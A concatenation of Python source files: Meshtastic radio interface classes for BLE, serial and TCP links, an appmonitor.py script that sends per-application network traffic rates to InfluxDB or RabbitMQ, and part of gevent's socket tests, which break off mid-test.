def __init__(self, address, debugOut=None):
self.address = address
self.adapter = pygatt.GATTToolBackend() # BGAPIBackend()
self.adapter.start()
logging.debug(f"Connecting to {self.address}")
self.device = self.adapter.connect(address)
logging.debug("Connected to device")
# fromradio = self.device.char_read(FROMRADIO_UUID)
MeshInterface.__init__(self, debugOut=debugOut)
self._readFromRadio() # read the initial responses
def handle_data(handle, data):
self._handleFromRadio(data)
self.device.subscribe(FROMNUM_UUID, callback=handle_data)
def _sendToRadio(self, toRadio):
"""Send a ToRadio protobuf to the device"""
logging.debug(f"Sending: {toRadio}")
b = toRadio.SerializeToString()
self.device.char_write(TORADIO_UUID, b)
def close(self):
self.adapter.stop()
def _readFromRadio(self):
wasEmpty = False
while not wasEmpty:
b = self.device.char_read(FROMRADIO_UUID)
wasEmpty = len(b) == 0
if not wasEmpty:
self._handleFromRadio(b)
class StreamInterface(MeshInterface):
"""Interface class for meshtastic devices over a stream link (serial, TCP, etc)"""
def __init__(self, debugOut=None, noProto=False, connectNow=True):
"""Constructor, opens a connection to self.stream
Keyword Arguments:
devPath {string} -- A filepath to a device, i.e. /dev/ttyUSB0 (default: {None})
debugOut {stream} -- If a stream is provided, any debug serial output from the device will be emitted to that stream. (default: {None})
Raises:
Exception: [description]
Exception: [description]
"""
if not hasattr(self, 'stream'):
raise Exception(
"StreamInterface is now abstract (to update existing code create SerialInterface instead)")
self._rxBuf = bytes() # empty
self._wantExit = False
self._rxThread = threading.Thread(target=self.__reader, args=())
MeshInterface.__init__(self, debugOut=debugOut, noProto=noProto)
# Start the reader thread after superclass constructor completes init
if connectNow:
self.connect()
def connect(self):
"""Connect to our radio
Normally this is called automatically by the constructor, but if you passed in connectNow=False you can manually
start the reading thread later.
"""
# Send some bogus UART characters to force a sleeping device to wake
self._writeBytes(bytes([START1, START1, START1, START1]))
time.sleep(0.1) # wait 100ms to give device time to start running
self._rxThread.start()
def _disconnected(self):
"""We override the superclass implementation to close our port"""
MeshInterface._disconnected(self)
logging.debug("Closing our port")
if not self.stream is None:
self.stream.close()
def _writeBytes(self, b):
"""Write an array of bytes to our stream and flush"""
self.stream.write(b)
self.stream.flush()
def _readBytes(self, len):
"""Read an array of bytes from our stream"""
return self.stream.read(len)
def _sendToRadio(self, toRadio):
"""Send a ToRadio protobuf to the device"""
logging.debug(f"Sending: {toRadio}")
b = toRadio.SerializeToString()
bufLen = len(b)
# We convert into a string, because the TCP code doesn't work with byte arrays
header = bytes([START1, START2, (bufLen >> 8) & 0xff, bufLen & 0xff])
self._writeBytes(header + b)
def close(self):
"""Close a connection to the device"""
logging.debug("Closing serial stream")
# pyserial cancel_read doesn't seem to work, therefore we ask the reader thread to close things for us
self._wantExit = True
if self._rxThread != threading.current_thread():
self._rxThread.join() # wait for it to exit
def __reader(self):
"""The reader thread that reads bytes from our stream"""
empty = bytes()
try:
while not self._wantExit:
b = self._readBytes(1)
if len(b) > 0:
# logging.debug(f"read returned {b}")
c = b[0]
ptr = len(self._rxBuf)
# Assume we want to append this byte, fixme use bytearray instead
self._rxBuf = self._rxBuf + b
if ptr == 0: # looking for START1
if c != START1:
self._rxBuf = empty # failed to find start
if self.debugOut != None:
try:
self.debugOut.write(b.decode("utf-8"))
except:
self.debugOut.write('?')
elif ptr == 1: # looking for START2
if c != START2:
self._rxBuf = empty # failed to find start2
elif ptr >= HEADER_LEN: # we've at least got a header
# big endian length follos header
packetlen = (self._rxBuf[2] << 8) + self._rxBuf[3]
if ptr == HEADER_LEN: # we _just_ finished reading the header, validate length
if packetlen > MAX_TO_FROM_RADIO_SIZE:
self._rxBuf = empty # length ws out out bounds, restart
if len(self._rxBuf) != 0 and ptr + 1 == packetlen + HEADER_LEN:
try:
self._handleFromRadio(self._rxBuf[HEADER_LEN:])
except Exception as ex:
logging.error(
f"Error while handling message from radio {ex}")
traceback.print_exc()
self._rxBuf = empty
else:
# logging.debug(f"timeout")
pass
except serial.SerialException as ex:
logging.warn(
f"Meshtastic serial port disconnected, disconnecting... {ex}")
finally:
logging.debug("reader is exiting")
self._disconnected()
class SerialInterface(StreamInterface):
"""Interface class for meshtastic devices over a serial link"""
def __init__(self, devPath=None, debugOut=None, noProto=False, connectNow=True):
"""Constructor, opens a connection to a specified serial port, or if unspecified try to
find one Meshtastic device by probing
Keyword Arguments:
devPath {string} -- A filepath to a device, i.e. /dev/ttyUSB0 (default: {None})
debugOut {stream} -- If a stream is provided, any debug serial output from the device will be emitted to that stream. (default: {None})
"""
if devPath is None:
ports = util.findPorts()
if len(ports) == 0:
raise Exception("No Meshtastic devices detected")
elif len(ports) > 1:
raise Exception(
f"Multiple ports detected, you must specify a device, such as {ports[0].device}")
else:
devPath = ports[0]
logging.debug(f"Connecting to {devPath}")
# Note: we provide None for port here, because we will be opening it later
self.stream = serial.Serial(
None, 921600, exclusive=True, timeout=0.5)
# rts=False Needed to prevent TBEAMs resetting on OSX, because rts is connected to reset
self.stream.port = devPath
# OS-X seems to have a bug in its serial driver. It ignores that we asked for no RTSCTS
# control and will always drive RTS either high or low (rather than letting the CP102 leave
# it as an open-collector floating pin). Since it is going to drive it anyways we want to make
# sure it is driven low, so that the TBEAM won't reset
if platform.system() == 'Darwin':
self.stream.rts = False
self.stream.open()
StreamInterface.__init__(
self, debugOut=debugOut, noProto=noProto, connectNow=connectNow)
def _disconnected(self):
"""We override the superclass implementation to close our port"""
if platform.system() == 'Darwin':
self.stream.rts = True # Return RTS high, so that the reset button still works
StreamInterface._disconnected(self)
class TCPInterface(StreamInterface):
"""Interface class for meshtastic devices over a TCP link"""
def __init__(self, hostname, debugOut=None, noProto=False, connectNow=True, portNumber=4403):
"""Constructor, opens a connection to a specified IP address/hostname
Keyword Arguments:
hostname {string} -- Hostname/IP address of the device to connect to
"""
logging.debug(f"Connecting to {hostname}")
server_address = (hostname, portNumber)
sock = socket.create_connection(server_address)
# Instead of wrapping as a stream, we use the native socket API
# self.stream = sock.makefile('rw')
self.stream = None
self.socket = sock
StreamInterface.__init__(
self, debugOut=debugOut, noProto=noProto, connectNow=connectNow)
def _disconnected(self):
"""We override the superclass implementation to close our port"""
StreamInterface._disconnected(self)
logging.debug("Closing our socket")
if not self.socket is None:
self.socket.close()
def _writeBytes(self, b):
"""Write an array of bytes to our stream and flush"""
self.socket.send(b)
def _readBytes(self, len):
"""Read an array of bytes from our stream"""
return self.socket.recv(len)
|
appmonitor.py
|
#!/usr/bin/python
import os, sys
import sh
import pika #aiopika
import ssl
import certifi
import time
import glob
import json
import pickle
import traceback
import threading
import queue
import urllib
import urllib.parse
import urllib.request
import imp
import logging
from dotenv import load_dotenv
log = logging.getLogger(__name__)
def f(s):
if s is None:
return ''
else:
return str(s).replace(',', '\,').replace(' ', '\ ')
class AppMonitor:
"""AppMonitor"""
FILESTATUS = "processedfiles.pickle" #TODO: TBD
thread_ctrl = None
iostatus = {}
influxdb = None
rabbitmq = None
listener = None
pluginfolder = os.path.join(os.path.dirname(os.path.abspath(__file__)), "plugins")
mainmodule = "module"
plugins = []
mode = None
deployment = None
def initInfluxdb(self):
if os.getenv('INFLUXDB_ENABLE') == 'true':
log.info("INFO:/influxdb enabled, checking environment variables...")
self.influxdb.deployment = self.deployment
if os.getenv('INFLUXDB_HOST') is not None:
self.influxdb.conf['host'] = os.getenv('INFLUXDB_HOST')
else:
log.error("ERROR: INFLUXDB_HOST not set, Exiting...")
sys.exit(1)
if os.getenv('INFLUXDB_PORT') != 0:
self.influxdb.conf['port'] = os.getenv('INFLUXDB_PORT')
else:
log.error("ERROR: INFLUXDB_PORT not set, Exiting...")
sys.exit(1)
if os.getenv('INFLUXDB_WRITE_USER') is not None:
self.influxdb.conf['userw'] = os.getenv('INFLUXDB_WRITE_USER')
else:
log.error("ERROR: INFLUXDB_WRITE_USER not set, Exiting...")
sys.exit(1)
if os.getenv('INFLUXDB_WRITE_USER_PASSWORD') is not None:
self.influxdb.conf['passw'] = os.getenv('INFLUXDB_WRITE_USER_PASSWORD')
else:
log.error("ERROR: INFLUXDB_WRITE_USER_PASSWORD not set, Exiting...")
sys.exit(1)
if os.getenv('INFLUXDB_DB') is not None:
self.influxdb.conf['database'] = os.getenv('INFLUXDB_DB')
else:
log.error("ERROR: INFLUXDB_DB not set, Exiting...")
sys.exit(1)
def initRabbitMQ(self):
if os.getenv('RABBITMQ_SSL_USER') is not None:
self.rabbitmq.user = os.getenv('RABBITMQ_SSL_USER')
else:
log.error("ERROR: RABBITMQ_SSL_USER not set, Exiting...")
sys.exit(1)
if os.getenv('RABBITMQ_SSL_PASS') is not None:
self.rabbitmq.password = os.getenv('RABBITMQ_SSL_PASS')
else:
log.error("ERROR: RABBITMQ_SSL_PASS not set, Exiting...")
sys.exit(1)
if os.getenv('RABBITMQ_SSL_HOST') is not None:
self.rabbitmq.host = os.getenv('RABBITMQ_SSL_HOST')
else:
log.error("ERROR: RABBITMQ_SSL_HOST not set, Exiting...")
sys.exit(1)
if os.getenv('RABBITMQ_SSL_PORT') is not None:
self.rabbitmq.port = os.getenv('RABBITMQ_SSL_PORT')
else:
log.error("ERROR: RABBITMQ_SSL_PORT not set, Exiting...")
sys.exit(1)
if os.getenv('RABBITMQ_SSL_CERTFILE') is not None:
self.rabbitmq.cert = os.getenv('RABBITMQ_SSL_CERTFILE')
else:
log.error("ERROR: RABBITMQ_SSL_CERTFILE not set, Exiting...")
sys.exit(1)
if os.getenv('RABBITMQ_SSL_PKEYFILE') is not None:
self.rabbitmq.keyf = os.getenv('RABBITMQ_SSL_PKEYFILE')
else:
log.error("ERROR: RABBITMQ_SSL_PKEYFILE not set, Exiting...")
sys.exit(1)
if os.getenv('RABBITMQ_SSL_CERTPASS') is not None:
self.rabbitmq.certpass = os.getenv('RABBITMQ_SSL_CERTPASS')
else:
log.error("ERROR: RABBITMQ_SSL_CERTPASS not set, Exiting...")
sys.exit(1)
if os.getenv('RABBITMQ_SSL_TOPIC') is not None:
self.rabbitmq.topic = os.getenv('RABBITMQ_SSL_TOPIC')
else:
log.error("ERROR: RABBITMQ_SSL_TOPIC not set, Exiting...")
sys.exit(1)
def __init__(self, thread_ctrl):
load_dotenv(verbose=True)
self.thread_ctrl = thread_ctrl
log.info("reading MODE: [{0}]".format(os.getenv('NMD_MODE')))
self.deployment = os.getenv('NMD_DEPLOYMENT')
if os.getenv('NMD_MODE') == 'consumer' or os.getenv('NMD_MODE') == 'standalone':
self.influxdb = self.InfluxDB(self.thread_ctrl)
self.initInfluxdb()
if os.getenv('NMD_MODE') == 'consumer':
self.rabbitmq = self.RabbitMQ(self.thread_ctrl)
self.initRabbitMQ()
self.mode = 'c' # consumer
else:
self.mode = 's' # standalone
else:
self.mode = 'p' # producer
self.rabbitmq = self.RabbitMQ(self.thread_ctrl)
self.initRabbitMQ()
for p in self.getPlugins():
log.info("Loading plugin " + p["name"])
plugin = self.loadPlugin(p)
priority, errmsg = plugin.init({'deployment' : self.deployment, 'conf_influxdb' : self.influxdb.conf}) #TODO: add continue/flags for graceful exit
if priority < 0:
log.info(errmsg)
sys.exit(1)
self.plugins.append({'plugin':plugin, 'priority':priority})
self.plugins = sorted(self.plugins, key = lambda i: i['priority']) #,reverse=True
def getPlugins(self):
plugins = []
pluginsdir = os.listdir(self.pluginfolder)
for p in pluginsdir:
location = os.path.join(self.pluginfolder, p)
if not os.path.isdir(location) or not p + ".py" in os.listdir(location):
continue
info = imp.find_module(p, [location])
plugins.append({"name": p, "info": info})
return plugins
def loadPlugin(self, plugin):
return imp.load_module(plugin["name"], *plugin["info"])
def pluginPreProcess(self, insertData):
for p in self.plugins:
insertData = p['plugin'].preprocess(insertData)
return insertData
class RabbitMQ(object):
host = None
port = 0
user = None
password = None
cert = None
keyf = None
certpass = None
topic = None
rabbitmq_queue = None
class MQWriter:
credentials = None
context = None
connection = None
channel = None
mqwriter = None
def __init__(self,thread_ctrl):
self.rabbitmq_queue = queue.Queue()
self.thread_ctrl = thread_ctrl
def rabbitmq_updater_thread(self, pluginPreProcess):
if self.mqwriter is None:
self.mqwriter = self.MQWriter()
self.mqwriter.credentials = pika.PlainCredentials(self.user, self.password)
self.mqwriter.context = ssl.create_default_context(cafile=certifi.where());
basepath = os.path.join(os.path.dirname(__file__), "../")
certfile = os.path.join(basepath, self.cert)
keyfile = os.path.join(basepath, self.keyf)
log.info("RabbitMQ SSL using {0} {1} from {2} to {3}:{4}".format(self.cert, self.keyf,\
basepath, self.host, self.port))
self.mqwriter.context.load_cert_chain(certfile, keyfile, self.certpass)
ssl_options = pika.SSLOptions(self.mqwriter.context, self.host)
try:
self.mqwriter.connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.host,
port=int(self.port),
ssl_options = ssl_options,
virtual_host='/',
credentials=self.mqwriter.credentials))
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
log.error("rabbitmq error: ({0}) {1} {2} {3}".format(str(e), exc_type, fname, exc_tb.tb_lineno))
traceback.print_exc()
sys.exit(1)
self.mqwriter.channel = self.mqwriter.connection.channel()
self.mqwriter.channel.queue_declare(queue=self.topic)
while self.thread_ctrl['continue']:
line = self.rabbitmq_queue.get()
self.mqwriter.channel.basic_publish(exchange='', routing_key=self.topic, body="{0}".format(line)) #summary
self.mqwriter.connection.close()
class InfluxDB(object):
conf = {
'host': None,
'port': 0,
'db': None,
'userw': None,
'passw': None,
'url': None
}
deployment = None
#database = None #moved to conf dict
thread_ctrl = None
insert_memory = None
#var built at runtime
#url = None #moved to conf
header = None
#insert = None #inser queue
influxdb_queue = None
def __init__(self,thread_ctrl):
self.influxdb_queue = queue.Queue()
self.thread_ctrl = thread_ctrl
def influxdb_updater_thread(self, pluginPreProcess):
while self.thread_ctrl['continue']:
if self.conf['url'] == None:
self.conf['url'] = "https://" + self.conf['host'] + ":" + self.conf['port'] + "/api/v2/write?bucket=" +\
self.conf['database'] + "/rp&precision=ns"
if self.header == None:
self.header = {'Authorization': 'Token ' + self.conf['userw'] + ":" + self.conf['passw']}
data = pluginPreProcess(self.influxdb_queue.get())
summary = data['summary']
if summary is None:
continue
if 'std' not in summary.keys():
log.warning("WARNING: malformed summary/insert data {0}".format(summary))
continue
else:
insert = summary['std']
extend = None
if 'ext' in summary.keys():
if 'insert' in summary['ext'].keys():
extend = summary['ext']['insert']
#log.info("EXTINFO: {}".format(summary['ext']))
for dev in insert.keys():
if insert[dev] is not None:
for app in insert[dev]:
log.info(app + "-" + dev + " " + str(insert[dev][app]))
try:
data = ''
TsEnd = None
TsEndMemory = None
for dev in insert.keys():
for app in insert[dev]:
#if insert[dev][app]['KbpsDw'] == 0.0 and\
# insert[dev][app]['KbpsUp'] == 0.0:
# continue
data = data + 'network_traffic_application_kbpsdw'+\
',deployment=' + self.deployment +\
',device=' + dev +\
',application=' + f(app) +\
' value=' + str(insert[dev][app]['KbpsDw']) +\
' ' + str(insert[dev][app]['TsEnd']) + '000000000' + '\n'
data = data + 'network_traffic_application_kbpsup'+\
',deployment=' + self.deployment +\
',device=' + dev +\
',application=' + f(app) +\
' value=' + str(insert[dev][app]['KbpsUp']) +\
' ' + str(insert[dev][app]['TsEnd']) + '000000000' + '\n'
if TsEnd is None:
TsEnd = str(insert[dev][app]['TsEnd'])
# there's no future data point for some of the devices, better to fill in w zero
# otherwise grafana will connect data points directly
if self.insert_memory is not None:
for dev in self.insert_memory.keys():
for app in self.insert_memory[dev]:
if TsEndMemory is None:
TsEndMemory = str(self.insert_memory[dev][app]['TsEnd'])
try:
#if float(insert[dev][app]['KbpsDw']) == 0.0 and\
# float(insert[dev][app]['KbpsUp']) == 0.0
#force key error if not present
insert[dev][app]['KbpsDw']
insert[dev][app]['KbpsUp']
except KeyError:
data = data + 'network_traffic_application_kbpsdw'+\
',deployment=' + self.deployment +\
',device=' + dev +\
',application=' + f(app) +\
' value=0' +\
' ' + TsEnd + '000000000' + '\n'
data = data + 'network_traffic_application_kbpsup'+\
',deployment=' + self.deployment +\
',device=' + dev +\
',application=' + f(app) +\
' value=0' +\
' ' + TsEnd + '000000000' + '\n'
#there's no past data point for some of the devices, better to fill in w zero
#otherwise grafana will create a "long" ramp in the ts
for dev in insert.keys():
for app in insert[dev]:
try:
self.insert_memory[dev][app]['KbpsDw'] #force key error if not present
self.insert_memory[dev][app]['KbpsUp']
except KeyError:
data = data + 'network_traffic_application_kbpsdw'+\
',deployment=' + self.deployment +\
',device=' + dev +\
',application=' + f(app) +\
' value=0' +\
' ' + TsEndMemory + '000000000' + '\n'
data = data + 'network_traffic_application_kbpsup'+\
',deployment=' + self.deployment +\
',device=' + dev +\
',application=' + f(app) +\
' value=0' +\
' ' + TsEndMemory + '000000000' + '\n'
self.insert_memory = insert
if extend is not None:
for insertLine in extend:
data = data + insertLine + "\n"
#print(insertLine)
data = data.encode()
req = urllib.request.Request(self.conf['url'], data, self.header)
with urllib.request.urlopen(req) as response:
log.info('OK' if response.getcode()==204 else 'Unexpected:'+str(response.getcode()))
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
log.error("EXCEPTION: influxdb_updater_thread: {0} {1} {2} (dev:{3}) {4}"\
.format(exc_type, fname, exc_tb.tb_lineno, dev, e)) #e.read().decode("utf8", 'ignore')
self.influxdb_queue.task_done()
##
# "fs" mode, handles of /tmp/tmp.ta.* file changes via tail
# "mq" mode, handles consumer message receive events
class TAHandler():
process_data_from_source = None
iostatus = None
thread_ctrl = None
worker = None
printFunc = None
running = True
filename = None
rabbitmq = None
mode = None
def __init__(self, process_data_from_source, iostatus, mode, thread_ctrl, rabbitmq=None, influxdb=None):
self.process_data_from_source = process_data_from_source
self.iostatus = iostatus
self.thread_ctrl = thread_ctrl
self.mode = mode
self.rabbitmq=rabbitmq
self.influxdb=influxdb
def mqreader(self):
connection = None
while self.thread_ctrl['continue'] and self.running:
if self.worker is None: #TODO: move code below to class
credentials = pika.PlainCredentials(self.rabbitmq.user, self.rabbitmq.password)
context = ssl.create_default_context(cafile=certifi.where());
basepath = os.path.join(os.path.dirname(__file__), "../")
certfile = os.path.join(basepath, self.rabbitmq.cert)
keyfile = os.path.join(basepath, self.rabbitmq.keyf)
log.info("RabbitMQ SSL using {0} {1} from {2} to {3}:{4}".format(self.rabbitmq.cert, self.rabbitmq.keyf,\
basepath, self.rabbitmq.host, self.rabbitmq.port))
context.load_cert_chain(certfile, keyfile, self.rabbitmq.certpass)
ssl_options = pika.SSLOptions(context, self.rabbitmq.host)
try:
connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.rabbitmq.host,
port=int(self.rabbitmq.port),
ssl_options = ssl_options,
virtual_host='/',
credentials=credentials))
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
log.error("rabbitmq error: ({0}) {1} {2} {3}".format(str(e), exc_type, fname, exc_tb.tb_lineno))
traceback.print_exc()
sys.exit(1)
channel = connection.channel()
channel.queue_declare(queue=self.rabbitmq.topic)
def callback(ch, method, properties, line):
try:
j=json.loads(line)
except Exception as e:
log.error("unrecognized message: {0}".format(line))
log.error("Exception: {0}".format(e))
return
summary=get_summary_from_json(j)
if summary is not None:
self.influxdb.influxdb_queue.put({'summary': summary, 'json': line})
else:
log.warning("can't get summary from {0}".format(line))
channel.basic_consume(queue=self.rabbitmq.topic, on_message_callback=callback, auto_ack=True)
self.worker = threading.Thread(target=self.process_data_from_source, args=(self.rabbitmq.topic, channel,))
self.iostatus[self.rabbitmq.topic] = {}
self.iostatus[self.rabbitmq.topic]['thread'] = self.worker
self.iostatus[self.rabbitmq.topic]['channel'] = channel
self.worker.start()
time.sleep(5)
channel.stop_consuming()
#connection.close()
#channel.cancel()
#channel.close()
def fsreader(self):
while self.thread_ctrl['continue'] and self.running:
files=glob.glob("/tmp/tmp.ta.*")
if len(files) > 1:
log.warning("WARNING: multiple tmp.ta.* files found.")
for f in files:
try:
if self.iostatus[f]['running']:
log.info("TAHandler {0} is running.".format(f))
continue
log.info("TAHandler ignoring {0}.".format(f))
except KeyError as ke:
if self.worker is not None:
self.iostatus[self.filename]['running'] = False
self.iostatus[self.filename]['tail'].kill()
self.worker.join()
log.info("TAHandler terminating {0}:{1}.".format(f, ke))
else:
log.info("TAHandler initializing {0}:{1}.".format(f, ke))
self.worker = threading.Thread(target=self.process_data_from_source, args=(f, self.mode=='s'))
self.iostatus[f] = {}
self.iostatus[f]['thread'] = self.worker
self.filename = f
self.worker.start()
except Exception as e:
log.error("ERROR: {0}".format(e))
time.sleep(10)
def start(self):
if self.mode == 's' or self.mode == 'p': # standalone or producer
self.thread = threading.Thread(target=self.fsreader) # file system (/tmp/tmp.ta.*)
elif self.mode == 'c': # consumer
self.thread = threading.Thread(target=self.mqreader) # rabbitmq receive
else:
log.error("INVALID MODE: {0}".format(self.mode))
print("INVALID MODE: {0}".format(self.mode))
sys.exit(1)
self.thread.start()
def stop(self):
self.running = False
def join(self):
self.thread.join()
def process_mq_ta(self, topic, channel):
log.info("Processing: " + topic)
try:
channel.start_consuming()
except pika.exceptions.StreamLostError:
log.warning("rabbimq SSL channel terminated")
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
log.error("process_mq_ta: {0} {1} {2} {3}".format(exc_type, fname, exc_tb.tb_lineno, e))
traceback.print_exc()
def process_tmp_ta(self, filename="", is_standalone=True):
if filename == "":
log.info("INFO: No files to process now.")
else:
if not os.path.isfile(filename):
log.error("ERROR: filename "+filename+" is not a file.")
return False
else:
log.info("Processing: " + filename)
self.iostatus[filename]['running'] = True
self.iostatus[filename]['tail'] = sh.tail("-F", filename, _iter=True, _bg_exc=False)
while self.iostatus[filename]['running'] and self.thread_ctrl['continue']:
try:
line = self.iostatus[filename]['tail'].next()
if is_standalone:
j = json.loads(line)
summary=get_summary_from_json(j)
if summary is not None:
self.influxdb.influxdb_queue.put({'summary': summary, 'json': line})
else:
log.warning("can't get summary from {0}".format(line))
else:
self.rabbitmq.rabbitmq_queue.put(line) # < --- sending raw lines for now
except sh.ErrorReturnCode_1: # as e:
log.info("process_tmp_ta: tail terminated {0}, (permission denied ?) ".format(filename))
break
except sh.SignalException_SIGKILL as e:
log.info("process_tmp_ta: tail terminated {0} {1}".format(filename, e))
break
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
log.error("process_tmp_ta: {0} {1} {2} {4}".format(exc_type, fname, exc_tb.tb_lineno, e))
log.info('process_tmp_ta: exiting ' + filename)
#with open(iostatus, 'wb') as handle:
# pickle.dump(iostatus, handle, protocol=pickle.HIGHEST_PROTOCOL)
return True
def run(self):
if self.mode == 'p': # producer
log.info("Running #### CLIENT/PRODUCER ####")
self.listener = self.TAHandler(self.process_tmp_ta, self.iostatus, self.mode, self.thread_ctrl)
self.listener.start()
if os.getenv('INFLUXDB_ENABLE') == 'true':
log.info("PRODUCER: running thread.")
threading.Thread(target=self.rabbitmq.rabbitmq_updater_thread,
args=(self.pluginPreProcess,),
daemon=True).start()
log.info("PRODUCER: Done")
elif self.mode == 'c': #consumer
log.info("Running #### SERVER/CONSUMER ####")
self.listener = self.TAHandler(self.process_mq_ta, self.iostatus, self.mode, self.thread_ctrl,\
self.rabbitmq, self.influxdb)
self.listener.start()
if os.getenv('INFLUXDB_ENABLE') == 'true':
log.info("CONSUMER: running thread.")
threading.Thread(target=self.influxdb.influxdb_updater_thread,
args=(self.pluginPreProcess,),
daemon=True).start()
log.info("CONSUMER: Done")
else: #standalone
log.info("Running #### STANDALONE ####")
self.listener = self.TAHandler(self.process_tmp_ta, self.iostatus, self.mode, self.thread_ctrl)
self.listener.start()
if os.getenv('INFLUXDB_ENABLE') == 'true':
log.info("STANDALONE: running thread.")
threading.Thread(target=self.influxdb.influxdb_updater_thread,
args=(self.pluginPreProcess,),
daemon=True).start()
log.info("STANDALONE: Done")
log.info("MAIN: joining threads")
try:
while self.thread_ctrl['continue']:
time.sleep(1)
try:
#if self.mode == 'p': # producer
# print("PRODUCER NOT YET IMPLEMENTED")
#elif self.mode == 'c': # consumer
# TBD
#else: # standalone
for k in self.iostatus.keys():
if 'running' in self.iostatus[k].keys():
if self.iostatus[k]['running']:
if 'thread' in self.iostatus[k].keys():
log.info("MAIN: waiting for " + k)
self.iostatus[k]['thread'].join()
self.iostatus[k]['running'] = False
log.info("MAIN: " +k + " joined")
except RuntimeError as re:
log.warning("WARNING: " + str(re))
pass
except KeyboardInterrupt:
self.stop()
log.info("MAIN: listener join")
self.listener.join()
if self.influxdb is not None:
self.influxdb.influxdb_queue.join()
def stop(self):
if self.mode == 's':
for k in self.iostatus.keys():
try:
self.iostatus[k]['tail'].kill()
except ProcessLookupError: # as ple: :TODO: improve this
pass
elif self.mode == 'c':
for k in self.iostatus.keys():
try:
self.iostatus[k]['channel'].close()
except Exception: #TODO: improve this
pass
self.listener.stop()
def get_summary_from_json(j):
summary = {'std' : {}, 'ext': {}} #std == standard, ext == extended (rDNS. GeoIP, etc)
if 'TrafficData' not in j.keys():
return None
if 'Data' not in j['TrafficData'].keys():
return None
if j['TrafficData']['Data'] is None:
return None
for d in j['TrafficData']['Data']:
device = 'Device'
if 'HwAddr' in d:
device = 'HwAddr'
if d[device] not in summary['std']:
summary['std'][d[device]] = {}
summary['ext'][d[device]] = {}
if d['Meta'] not in summary['std'][d[device]]:
summary['std'][d[device]][d['Meta']] = { 'KbpsDw': 0.0, 'KbpsUp': 0.0, 'TsEnd': 0 }
summary['ext'][d[device]][d['Meta']] = { 'Domain': None, 'SIP': None }
summary['std'][d[device]][d['Meta']]['TsEnd'] = j['Info']['TsEnd']
summary['std'][d[device]][d['Meta']]['KbpsDw'] =\
summary['std'][d[device]][d['Meta']]['KbpsDw'] + d['KbpsDw']
summary['std'][d[device]][d['Meta']]['KbpsUp'] =\
summary['std'][d[device]][d['Meta']]['KbpsUp'] + d['KbpsUp']
summary['std'][d[device]][d['Meta']]['Domain'] = d['Domain']
summary['std'][d[device]][d['Meta']]['SIP'] = d['SIP']
#log.debug("DOMAIN:" + d['Domain'] + "," + d['SIP'])
#for dev in summary.keys():
# for app in summary[dev]:
# log.debug(app + "-" + dev + " " + str(summary[dev][app]))
return summary
#if __name__ == "__main__":
# app = AppMonitor()
# app.run()
|
test__socket.py
|
from gevent import monkey; monkey.patch_all()
import sys
import os
import array
import socket
import traceback
import time
import greentest
from functools import wraps
import _six as six
# we use threading on purpose so that we can test both regular and gevent sockets with the same code
from threading import Thread as _Thread
def wrap_error(func):
@wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except:
traceback.print_exc()
os._exit(2)
return wrapper
class Thread(_Thread):
def __init__(self, **kwargs):
target = kwargs.pop('target')
target = wrap_error(target)
_Thread.__init__(self, target=target, **kwargs)
self.start()
class TestTCP(greentest.TestCase):
__timeout__ = None
TIMEOUT_ERROR = socket.timeout
long_data = ", ".join([str(x) for x in range(20000)])
if six.PY3:
long_data = long_data.encode('ascii')
def setUp(self):
greentest.TestCase.setUp(self)
listener = socket.socket()
greentest.bind_and_listen(listener, ('127.0.0.1', 0))
self.listener = listener
self.port = listener.getsockname()[1]
def cleanup(self):
if hasattr(self, 'listener'):
try:
self.listener.close()
except:
pass
del self.listener
def create_connection(self, host='127.0.0.1', port=None, timeout=None,
blocking=None):
sock = socket.socket()
sock.connect((host, port or self.port))
if timeout is not None:
sock.settimeout(timeout)
if blocking is not None:
sock.setblocking(blocking)
return self._close_on_teardown(sock)
def _test_sendall(self, data, match_data=None, client_method='sendall',
**client_args):
read_data = []
server_exc_info = []
def accept_and_read():
try:
conn, _ = self.listener.accept()
r = conn.makefile(mode='rb')
read_data.append(r.read())
r.close()
conn.close()
except:
server_exc_info.append(sys.exc_info())
server = Thread(target=accept_and_read)
client = self.create_connection(**client_args)
try:
getattr(client, client_method)(data)
finally:
client.shutdown(socket.SHUT_RDWR)
client.close()
server.join()
if match_data is None:
match_data = self.long_data
self.assertEqual(read_data[0], match_data)
if server_exc_info:
six.reraise(*server_exc_info[0])
def test_sendall_str(self):
self._test_sendall(self.long_data)
if not six.PY3:
def test_sendall_unicode(self):
self._test_sendall(six.text_type(self.long_data))
def test_sendall_array(self):
data = array.array("B", self.long_data)
self._test_sendall(data)
def test_sendall_empty(self):
data = b''
self._test_sendall(data, data)
def test_sendall_empty_with_timeout(self):
# Issue 719
data = b''
self._test_sendall(data, data, timeout=10)
def test_sendall_nonblocking(self):
# https://github.com/benoitc/gunicorn/issues/1282
# Even if the socket is non-blocking, we make at least
# one attempt to send data. Under Py2 before this fix, we
# would incorrectly immediately raise a timeout error
data = b'hi\n'
self._test_sendall(data, data, blocking=False)
def test_empty_send(self):
# Issue 719
data = b''
self._test_sendall(data, data, client_method='send')
def test_fullduplex(self):
N = 100000
def server():
(remote_client, _) = self.listener.accept()
# start reading, then, while reading, start writing. the reader should not hang forever
def sendall():
remote_client.sendall(b't' * N)
sender = Thread(target=sendall)
result = remote_client.recv(1000)
self.assertEqual(result, b'hello world')
sender.join()
remote_client.close()
server_thread = Thread(target=server)
client = self.create_connection()
client_file = client.makefile()
client_reader = Thread(target=client_file.read, args=(N, ))
time.sleep(0.1)
client.sendall(b'hello world')
time.sleep(0.1)
# close() used to hang
client_file.close()
client.close()
# this tests "full duplex" bug;
server_thread.join()
client_reader.join()
def test_recv_timeout(self):
client_sock = []
acceptor = Thread(target=lambda: client_sock.append(self.listener.accept()))
client = self.create_connection()
client.settimeout(1)
start = time.time()
self.assertRaises(self.TIMEOUT_ERROR, client.recv, 1024)
took = time.time() - start
